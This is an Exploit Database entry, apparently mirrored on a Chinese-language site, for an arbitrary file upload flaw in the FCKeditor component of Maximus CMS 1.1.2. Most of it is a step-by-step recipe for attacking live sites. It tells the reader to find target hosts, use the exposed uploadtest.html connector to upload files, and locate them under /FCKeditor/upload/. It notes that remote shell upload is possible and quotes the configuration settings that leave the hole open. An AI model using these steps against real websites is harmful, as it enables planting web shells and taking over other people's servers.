Maximus CMS 1.1.2 – ‘FCKeditor’ Arbitrary File Upload

• Exploit Database
• 110 阅读

• 作者： eidelweiss
  日期： 2011-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15960/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60

  | | /|_________________________________________________________________________|\ / \ /===============================================================================\ |Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability | |develop: http://www.php-maximus.org | |Version: Maximus 2008 CMS: Web Portal System (v.1.1.2) | |Tested On: Live site | |Dork: use your skill and play your imagination :P | |Author: eidelweiss | |contact: eidelweiss[at]windowslive[dot]com | |Home: http://www.eidelweiss.info | | | | | \===============================================================================/ / NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT \ ---------------------------------------------------------------------------------   |============================================================================================| |Original advisories: | |http://eidelweiss-advisories.blogspot.com/2011/01/maximus-cms-fckeditor-arbitrary-file.html | |============================================================================================|   exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html   [!] first find the target host   ex: www.site.com or www.target.com/maximus   then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#   [!] select # "php" as "File Uploader" to use... and select "file" as Resource Type   [!] Upload There Hacked.txt or whatever.txtAnd Copy the Output Link or   [!] after upload without any errors your file will be here: /FCKeditor/upload/   ex: http://site.com//FCKeditor/upload/whatever.txt     NB: remote shell upload also possible !!!   Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"   ---------- $Config[&apos;Enabled&apos;] = true ; // <=     // Path to user files relative to the document root. $Config[&apos;UserFilesPath&apos;] = &apos;/FCKeditor/upload/&apos; ; ----------   and also $Config[&apos;AllowedExtensions&apos;][&apos;File&apos;]   with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn&apos;t properly checked     =========================| -=[ E0F ]=- |=================================